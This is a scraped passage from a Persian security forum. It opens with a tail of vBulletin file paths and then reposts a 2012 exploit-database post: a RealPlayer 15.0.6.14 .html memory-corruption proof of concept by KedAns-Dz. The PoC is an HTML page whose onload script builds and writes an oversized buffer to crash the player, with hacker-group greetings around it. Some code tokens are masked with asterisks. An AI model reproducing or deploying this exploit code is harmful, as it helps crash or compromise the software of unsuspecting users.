    /includes/api/1/forum.php 
    /includes/api/1/forumdisplay.php 
    /includes/api/1/inlinemod_domergeposts.php 
    /includes/api/1/list.php 
    /includes/api/1/login_lostpw.php 
    /includes/api/1/member.php 
    /includes/api/1/memberlist_search.php 
    /includes/api/1/misc_showattachments.php 
    /includes/api/1/misc_whoposted.php 
    /includes/api/1/newreply_newreply.php 
    /includes/api/1/newreply_postreply.php 
    /includes/api/1/newthread_postthread.php 
    /includes/api/1/newthread_newthread.php 
    /includes/api/1/poll_newpoll.php 
    /includes/api/1/poll_polledit.php 
    /includes/api/1/poll_showresults.php 
    /includes/api/1/private_editfolders.php 
    /includes/api/1/private_insertpm.php 
    /includes/api/1/private_messagelist.php 
    /includes/api/1/private_newpm.php 
    /includes/api/1/private_showpm.php 
    /includes/api/1/private_trackpm.php 
    /includes/api/1/profile_editattachments.php 
    /includes/api/1/profile_editoptions.php 
    /includes/api/1/profile_editprofile.php 
    /includes/api/1/register_addmember.php 
    /includes/api/1/register_checkdate.php 
    /includes/api/1/search_process.php 
    /includes/api/1/search_showresults.php 
    /includes/api/1/showthread.php 
    /includes/api/1/subscription_addsubscription.php 
    /includes/api/1/subscription_editfolders.php 
    /includes/api/1/subscription_viewsubscription.php 
    /includes/api/1/threadtag_managetags.php 
    /includes/api/2/album_picture.php 
    /includes/api/2/api_blogcategorylist.php 
    /includes/api/2/blog_blog.php 
    /includes/api/2/blog_bloglist.php 
    /includes/api/2/blog_list.php 
    /includes/api/2/blog_subscription_entrylist.php 
    /includes/api/2/blog_subscription_userlist.php 
    /includes/api/2/blog_usercp_groups.php 
    /includes/api/2/content.php 
    /includes/api/2/editpost_editpost.php 
    /includes/api/2/forumdisplay.php 
    /includes/api/2/member.php 
    /includes/api/2/newreply_newreply.php 
    /includes/api/2/forum.php 
    /includes/api/2/poll_newpoll.php 
    /includes/api/2/poll_polledit.php 
    /includes/api/2/poll_showresults.php 
    /includes/api/2/private_messagelist.php 
    /includes/api/2/private_trackpm.php 
    /includes/api/2/profile_editattachments.php 
    /includes/api/2/search_showresults.php 
    /includes/api/2/showthread.php 
    /includes/api/3/api_gotonewpost.php 
    /includes/api/4/album_user.php 
    /includes/api/4/api_forumlist.php 
    /includes/api/4/api_getnewtop.php 
    /includes/api/4/breadcrumbs_create.php 
    /includes/api/4/facebook_getforumid.php 
    /includes/api/4/facebook_getnewforummembers.php 
    /includes/api/4/get_vbfromfacebook.php 
    /includes/api/4/login_facebook.php 
    /includes/api/4/newreply_postreply.php 
    /includes/api/4/newthread_postthread.php 
    /includes/api/4/register.php 
    /includes/api/4/register_addmember.php 
    /includes/api/4/search_findusers.php 
    /includes/api/4/subscription_viewsubscription.php 
    /includes/api/5/api_init.php 
    /includes/api/6/api_getnewtop.php 
    /includes/api/6/api_gotonewpost.php 
    /includes/api/6/content.php 
    /includes/api/6/member.php 
    /includes/api/6/newthread_newthread.php 
    /includes/block/blogentries.php 
    /includes/block/cmsarticles.php 
    /includes/block/html.php 
    /includes/block/newposts.php 
    /includes/block/sgdiscussions.php 
    /includes/block/tagcloud.php 
    /includes/block/threads.php 
    /forumrunner/include/subscriptions.php 
    /forumrunner/include/search_forum.php 
    /forumrunner/include/profile.php 
    /forumrunner/include/post.php 
    /forumrunner/include/pms.php 
    /forumrunner/include/online.php 
    /forumrunner/include/moderation.php 
    /forumrunner/include/misc.php 
    /forumrunner/include/login.php 
    /forumrunner/include/get_thread.php 
    /forumrunner/include/get_forum.php 
    /forumrunner/include/cms.php 
    /forumrunner/include/attach.php 
    /forumrunner/include/announcement.php 
    /forumrunner/include/album.php 
    /forumrunner/support/vbulletin_methods.php 
    /forumrunner/support/stringparser_bbcode.class.php 
    /forumrunner/support/utils.php 
    /forumrunner/support/other_methods.php 
    /packages/skimlinks/hooks/postbit_display_complete.php 
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php  
      
    # 1337day.com [2012-12-12]
     
  12. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

    PHP:
    <!-- 
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0 
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm KedAns-Dz member from Inj3ct0r Team                1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    ### 
    # Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC 
    # Author : KedAns-Dz 
    # E-mail : ked-h (@hotmail.com / @1337day.com) 
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) 
    # *** Site : www.1337day.com .net .org 
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d 
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com 
    # Platform/CatID : local - 0day 
    # Type : Local Exploit - proof of concept 
    # Tested on : Windows7 (Fr) 
    ### 
      
    # <3 <3 Greetings t0 Palestine <3 <3 
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting 
      
    Info : 
    Save the HTML Code as p0c.html and drop/open it with Realplayer 
    ABCABC........... Boom !!! ^__^ 
      
    --> 
      
    <html> 
    <head> 
    <title>Memory Corruption bY KedAns-Dz</title> 
    <**** onload="**********:KedAns();"> 
    <script ********="**********"> 
    function KedAns() 

      
    // (puf) it's just for make a buffer and Crash ! 
    var puf =unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
    puf+=unescape("䅂䅂"); 
      
    ********.write(puf); // Buffer1 
      
    var buffer = '\x41\x42\x43' // ABC buffer 
    for(i=0; i <= 999 ; ++i) 

    buffer+=buffer+buffer 
    ********.write(buffer); // Corrupt this !!! 
      

      
    // [ Memory Corruption !! (*__^) ] 
      
    }  
    </script> 
    </head> 
    </****> 
    </html> 
    <!-- 
      
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== 
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, 
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) 
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection 
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all 
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD 
    # packetstormsecurity.org * ****sploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits ***s 
    #============================================================================================================ -->  
      
    # 1337day.com [2012-12-12]
     
بارگذاری...
مطالب مشابه
  1. sajjadsotoudeh
    پاسخ ها:
    1
    دانلودها:
    960
  2. Sir.h4m1D
    پاسخ ها:
    0
    دانلودها:
    393
  3. Mkali07
    پاسخ ها:
    1
    دانلودها:
    929
  4. JOK3R
    پاسخ ها:
    0
    دانلودها:
    1,186
  5. MR.SHDOVV
    پاسخ ها:
    5
    دانلودها:
    1,252
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .